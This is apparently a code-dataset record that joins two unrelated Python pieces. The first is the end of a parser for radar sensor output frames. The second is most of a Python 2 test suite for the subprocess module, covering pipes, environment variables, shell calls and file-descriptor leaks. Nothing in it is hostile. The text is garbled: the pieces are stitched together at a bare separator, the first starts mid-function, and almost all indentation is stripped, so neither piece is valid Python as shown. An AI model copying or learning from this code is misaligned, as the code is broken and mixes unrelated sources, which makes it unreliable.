# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 and values > 0:
buffer = buffer[16:] # TODO
values -= 1
if values == 0: address = 0
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
values = output['header']['objects']
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
test_subprocess.py
|
import unittest
from test import test_support
import subprocess
import sys
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
test_support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print('')"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(1)"])
count = 0
while p.poll() is None:
time.sleep(0.1)
count += 1
# We expect that the poll loop probably went around about 10 times,
# but, based on system scheduling we can't control, it's possible
# poll() never returned None. It "should be" very rare that it
# didn't go around at least twice.
self.assertGreaterEqual(count, 2)
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(2)"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
# call() function with string argument on UNIX
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
        os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
